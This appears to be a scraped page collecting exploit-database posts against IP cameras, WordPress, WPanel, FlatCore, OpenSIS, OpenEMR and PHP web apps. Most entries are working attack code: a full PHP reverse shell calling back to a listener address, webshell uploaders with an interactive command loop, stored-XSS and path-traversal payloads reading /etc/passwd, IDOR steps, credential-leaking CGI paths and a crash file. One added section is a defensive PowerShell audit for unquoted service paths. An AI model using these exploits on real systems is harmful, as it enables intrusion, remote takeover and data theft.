All posts published by ISHACK AI BOT
-
Compro Technology IP Camera - 'Multiple' Credential Disclosure
# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40380

There are unauthorized access vulnerabilities, which can lead to the disclosure of device administrator usernames and passwords or RTSP usernames and passwords.

Payload:

/cgi-bin/cameralist/cameralist.cgi
/cgi-bin/cameralist/setcamera.cgi?id=*

Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
-
Compro Technology IP Camera - 'index_MJpeg.cgi' Stream Disclosure
# Exploit Title: Compro Technology IP Camera - 'index_MJpeg.cgi' Stream Disclosure
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40381

There is an unauthorized access vulnerability, which can lead to unauthorized access to the camera video page.

Payload:

/cgi-bin/view/index_MJpeg.cgi

Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
-
Compro Technology IP Camera - 'mjpegStreamer.cgi' Screenshot Disclosure
# Exploit Title: Compro Technology IP Camera - 'mjpegStreamer.cgi' Screenshot Disclosure
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40382

There is an unauthorized access vulnerability, which can lead to unauthorized access to camera video screenshots.

Payload:

/mjpegStreamer.cgi

Please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
-
WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)
# Date: 02/09/2021
# Exploit Author: Nikhil Kapoor
# Software Link: https://wordpress.org/plugins/duplicate-page/
# Version: 4.4.1
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Duplicate Page
3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field.
4. Click Save Changes.
5. You will observe that the payload is stored in the database, and when the same functionality is triggered the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><svg/onload=confirm(/XSS/)>
-
WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 07/06/2021
# Exploit Author: Sentinal920
# Vendor Homepage: https://github.com/wpanel
# Software Link: https://github.com/wpanel/wpanel4-cms
# Version: 4.3.1
# Tested on: Linux

```python
import requests
import random, string

# Change This ###################################
url = 'http://192.168.182.134:8080'
email = '[email protected]'
password = 'admin'
###################################

# PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php
# Works on linux/windows/mac
###########################################################################
# Make sure to change lhost and lport in the reverse shell below (Line 223)
###########################################################################

# Get_Cookies
r = requests.get(url)
r2 = requests.get(url, cookies=r.cookies)
cookie = r2.cookies['wpanel_csrf_cookie']

name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9))

payload = '''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="wpanel_csrf_token"

''' + cookie + '''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="titulo"

''' + name + '''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="descricao"

''' + name + '''
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="tags"

tesad
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php"
Content-Type: application/x-php

<?php
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $options = array(); // proc_open() options
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }
    private function detect() {
        $detected = true;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
            $this->options['bypass_shell'] = true; // we do not want a shell within a shell
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
        } else if (posix_setsid() < 0) {
            // once daemonized you will actually no longer see the script's dump
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0);          // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function dump($data) {
        // HTML-escape angle brackets before echoing the shell output into the <pre> block
        $data = str_replace('<', '&lt;', $data);
        $data = str_replace('>', '&gt;', $data);
        echo $data;
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();
            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }
                    // ----- WORK BEGIN -----
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
                    do {
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
                        }                                                                    // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------
                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------
                fclose($socket);
            }
            // ------ SOCKET END ------
        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('192.168.182.136', 9000);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>
-----------------------------45668787242378192391383974033
Content-Disposition: form-data; name="status"

1
-----------------------------45668787242378192391383974033--
'''

data = 'wpanel_csrf_token=' + cookie + '&email=' + email + '&password=' + password
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Login_as_admin
r3 = requests.post(url + '/index.php/admin/login', cookies=r.cookies, headers=headers, data=data)


def exploit_gallery():
    # Adding_Reverse_Shell
    headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'}
    r4 = requests.post(url + '/index.php/admin/galleries/add', cookies=r.cookies, headers=headers2, data=payload)
    print('')
    print('Shell Uploaded as: ' + name)
    print('')
    print('Visit: ' + url + '/index.php/admin/galleries')
    print('OR')
    print('Visit: ' + url + '/index.php/galleries')
    print('')


exploit_gallery()

#def exploit_post():
#def exloit_pages():
#def dashboard_avatar_image():
```
-
OpenSIS 8.0 'modname' - Directory Traversal
# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
# Date: 09-02-2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE: CVE-2021-40651

The 'modname' parameter in 'Modules.php' is vulnerable to local file inclusion. This vulnerability can be exploited to expose sensitive information from arbitrary files on the underlying system.

To exploit the vulnerability, someone must log in as the "Parent" user and navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. This passes the 'modname' parameter and requests Portal.php's contents. By going back a few directories using '..%2f', decoded as '../', it was possible to disclose arbitrary files from the server's filesystem as long as the application has access to the file.

1. Login as "Parent"
2. Open a web proxy such as BurpSuite and capture the requests
3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
4. Check the response

PoC: https://youtu.be/wFwlbXANRCo
-
Remote Mouse 4.002 - Unquoted Service Path
# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe
# Vendor Homepage: https://www.remotemouse.net/
# Version: Remote Mouse 3.008 & 4.002
# Tested on: Windows 10

# Proof of Concept:

```text
C:\Users\death>sc qc RemoteMouseService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RemoteMouseService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : RemoteMouseService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
RemoteMouseService    RemoteMouseService    C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe    Auto
```
-
OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)
# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)
# Date: 31/08/2021
# Exploit Author: Allen Enosh Upputori
# Vendor Homepage: https://www.open-emr.org
# Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads
# Version: 6.0.0
# Tested on: Linux
# CVE : CVE-2021-40352

How to Reproduce this Vulnerability:

1. Install OpenEMR 6.0.0
2. Login as a Physician
3. Open Messages
4. Click Print
5. Change the existing "noteid=" value to another number

This will reveal everybody's messages, including admin-only messages.
-
Argus Surveillance DVR 4.0 - Unquoted Service Path
# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 10
# Note: "Start as service on Windows Startup" must be enabled in Program Options

# Proof of Concept:

```text
C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2    AUTO_START
        ERROR_CONTROL      : 1    NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Argus Surveillance DVR Watchdog
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Argus Surveillance DVR Watchdog    ARGUSSURVEILLANCEDVR_WATCHDOG    C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe    Auto
```
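An added audit script for the two unquoted service path posts above (Remote Mouse and Argus); it is not part of either post and assumes an elevated PowerShell on the host being audited, plus the default English names of the low-privilege groups (localized systems need those adjusted). Beyond the wmic one-liner in the posts, it lists the intermediate executables Windows would try before the real one, checks whether a low-privilege group can create files in those directories (the condition that makes the weakness actually exploitable; on default ACLs for C:\ and Program Files it is not), and prints the sc.exe command that quotes the path.

```powershell
# Added audit script, not from the Remote Mouse or Argus posts. Run from an elevated PowerShell.
# Finds auto-start services whose unquoted ImagePath contains spaces, shows the intermediate
# executables Windows would try first (e.g. C:\Program.exe), reports whether a low-privilege
# group can create files in those directories, and prints the sc.exe command that quotes the path.

# Assumption: default English well-known group names; adjust on localized Windows builds.
$lowPrivGroups = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# CreateFiles is the bit that matters: AppendData alone (granted to Authenticated Users on C:\)
# only allows creating subfolders, which is not enough to plant C:\Program.exe.
$createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles

function Test-LowPrivCreateFiles {
    # True when an Allow ACE grants CreateFiles on $Directory to one of $lowPrivGroups.
    # Deny ACEs and unmapped generic rights are ignored, so verify a True result by hand.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $createFiles) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } |
        ForEach-Object {
            $svc  = $_
            $path = $svc.PathName.Trim()
            # Already quoted, or under %SystemRoot%: the same exclusions as the wmic one-liner
            if ($path.StartsWith('"')) { return }
            if ($path -like "$env:SystemRoot\*") { return }
            $idx = $path.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
            if ($idx -lt 0) { return }
            $exe     = $path.Substring(0, $idx + 4)   # executable part of the image path
            $svcArgs = $path.Substring($idx + 4)      # trailing service arguments, if any
            if ($exe -notmatch ' ') { return }        # no spaces: CreateProcess parses it unambiguously

            # CreateProcess tries each space-delimited prefix (with .exe appended) before the real path
            $tokens = $exe -split ' '
            $candidates = for ($i = 1; $i -lt $tokens.Count; $i++) {
                $candidate = ($tokens[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Candidate        = $candidate
                    Directory        = $dir
                    LowPrivCanCreate = Test-LowPrivCreateFiles -Directory $dir
                }
            }

            # Remediation: wrap the executable in quotes, keeping any arguments outside them
            $quotedPath = '"' + $exe + '"' + $svcArgs
            [pscustomobject]@{
                Service     = $svc.Name
                ImagePath   = $path
                RunsAs      = $svc.StartName
                Exploitable = @($candidates | Where-Object { $_.LowPrivCanCreate }).Count -gt 0
                Candidates  = $candidates
                Remediation = 'sc.exe config "' + $svc.Name + '" binPath= "' + ($quotedPath -replace '"', '\"') + '"'
            }
        }
}

Get-UnquotedServicePath | Format-List
```

A service that runs as LocalSystem with Exploitable = True is the case worth escalating; an unquoted path whose intermediate directories are not writable by standard users is a hygiene finding to fix with the printed command.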
-
FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
# - https://github.com/flatCore/flatCore-CMS/issues/52

```python
#!/usr/bin/env python3
import sys
import requests
from lxml import html
from urllib.parse import urlencode

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
    exit(1)

TARGET = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]

# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1", data={
    "login_name": f"{USERNAME}",
    "login_psw": f"{PASSWORD}",
    "login": "Anmelden"})

# grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]

# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons", headers={"Cookie": PHPSESSID})
if resp.status_code != 200:
    print("Invalid credentials")
    exit(1)
else:
    print("Logged in")

# grab the csrf token for the script upload
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value

# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
                     data={"upload_type": "plugin", "csrf_token": csrf_token},                  # the csrf token
                     files={"file": ("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")},  # the webshell
                     headers={"Cookie": PHPSESSID})                                               # the php session id

# pretend to be a shell
while True:
    command = input("$ ")
    if command.lower() == "exit" or command.lower() == "q":
        break
    resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg': command})}")
    # verify payload succeeded
    if resp.status_code == 200:
        print(resp.text)
    else:
        print("Error: Something went wrong, maybe the shell didn't work?")
        break

# delete the webshell
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php", headers={"Cookie": PHPSESSID})
if resp.status_code == 200:
    print("Cleaned up webshell")

# clean up the session
resp = requests.get(f"{TARGET}/index.php?goto=logout", headers={"Cookie": PHPSESSID})
if resp.status_code == 200:
    print("Logged out")
exit(0)
```
-
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
# Date: 2021-09-05
# Exploit Author: sudoninja
# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server

# Vulnerable page : http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
# Vulnerable parameter : The viewid parameter is vulnerable to Insecure direct object references (IDOR)

# Proof Of Concept :
# 1. Download and install [ bus-pass-management-system ]
# 2. Go to /admin/index.php and enter Username & Password
# 3. Navigate to search >> search pass
# 4. Click on the view and change the viewid in the URL

Use: http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]
-
Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import logging
import requests
import argparse

BANNER = """
╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
by:
\033[0m\033[1;31m █████╗    ██████╗ ███████╗██╗   ██╗\033[0m
\033[0m\033[1;32m██╔══██╗   ██╔══██╗██╔════╝██║   ██║\033[0m
\033[0m\033[1;33m███████║ ███ ██████╔╝█████╗  ██╗ ██═╝\033[0m
\033[0m\033[1;34m██╔══██║   ██╔══██╗██╔══╝    ██╔╝   \033[0m
\033[0m\033[1;35m██║  ██║   ██║  ██║███████╗  ██║    \033[0m
\033[0m\033[1;36m╚═╝  ╚═╝   ╚═╝  ╚═╝╚══════╝  ╚═╝    \033[0m
"""


def exploit(url: str, file: str, delay: int) -> None:
    if not os.path.exists(file):
        logging.error(f'webshell payload "{file}" does not exist?')
        return
    logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
    uploadTime = int(time.time())
    r = requests.post(url + '/classes/SystemSettings.php',
                      files={'img': (os.path.basename(file), open(file, 'rb'))},  # NOTE: can also use 'cover' field, but this is more inconspicuous
                      params={'f': 'update_settings'},
                      verify=False)
    if not r.ok:
        logging.error('HTTP upload request failed')
        return
    logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
    # the server prefixes the stored file with its upload timestamp, so probe a window around ours
    for i in range(uploadTime - delay, uploadTime + delay + 1):
        r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
        logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
        # NOTE: website will send redirects for all files that do not exist
        if r.status_code != 302:
            logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
            return
    logging.error('failed to find payload on target')
    logging.warning('maybe need a larger delay or uploads directory is not writable?')
    return


if __name__ == '__main__':
    # parse arguments
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
    parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
    parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
    parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
    parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
    args = parser.parse_args()
    # define logger
    logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s',
                        datefmt='%d %b %Y %H:%M:%S',
                        level='INFO' if not args.debug else 'DEBUG')
    logging.SUCCESS = logging.CRITICAL + 1
    logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
    logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
    logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
    logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
    logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
    # print banner
    print(BANNER)
    # run exploit
    exploit(args.url, args.payload, args.delay)
```
-
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)
# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit

=========================================================================

```python
buffer = "//"
buffer += "A" * 423
f = open("path.txt", "w")
f.write(buffer)
f.close()
```

1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non-existing IP the FTP server can't reach (e.g. 255.255.255.255)
4. In Path, copy-paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non-existing IP the FTP server can't reach (e.g. 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
4. SmartFTP client crashes
-
Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import logging
import requests
import argparse

BANNER = """
╔═══════════════════════════════════════════════════════════════════╗
║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║
╚═══════════════════════════════════════════════════════════════════╝
by:
\033[0m\033[1;31m █████╗    ██████╗ ███████╗██╗   ██╗\033[0m
\033[0m\033[1;32m██╔══██╗   ██╔══██╗██╔════╝██║   ██║\033[0m
\033[0m\033[1;33m███████║ ███ ██████╔╝█████╗  ██╗ ██═╝\033[0m
\033[0m\033[1;34m██╔══██║   ██╔══██╗██╔══╝    ██╔╝   \033[0m
\033[0m\033[1;35m██║  ██║   ██║  ██║███████╗  ██║    \033[0m
\033[0m\033[1;36m╚═╝  ╚═╝   ╚═╝  ╚═╝╚══════╝  ╚═╝    \033[0m
"""


def exploit(url: str, file: str) -> None:
    if not os.path.exists(file):
        logging.error(f'{file} does not exist?')
        return
    logging.info(f'reading {file} for XSS content ...')
    with open(file, 'r') as f:
        xssPayload = f.read()
    logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
    r = requests.post(url + '/classes/SystemSettings.php',
                      data={'about_us': xssPayload},
                      params={'f': 'update_settings'},
                      verify=False)
    if not r.ok:
        logging.error('HTTP request failed')
        return
    logging.info('checking for XSS payload on main page ...')
    r = requests.get(url)
    if xssPayload not in r.text:
        logging.error(f'XSS injection failed? received: {r.text}')
        logging.warning('maybe about.html is not writable?')
        return
    logging.success('XSS payload found on target website')
    return


if __name__ == '__main__':
    # parse arguments
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
    parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
    parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
    parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
    args = parser.parse_args()
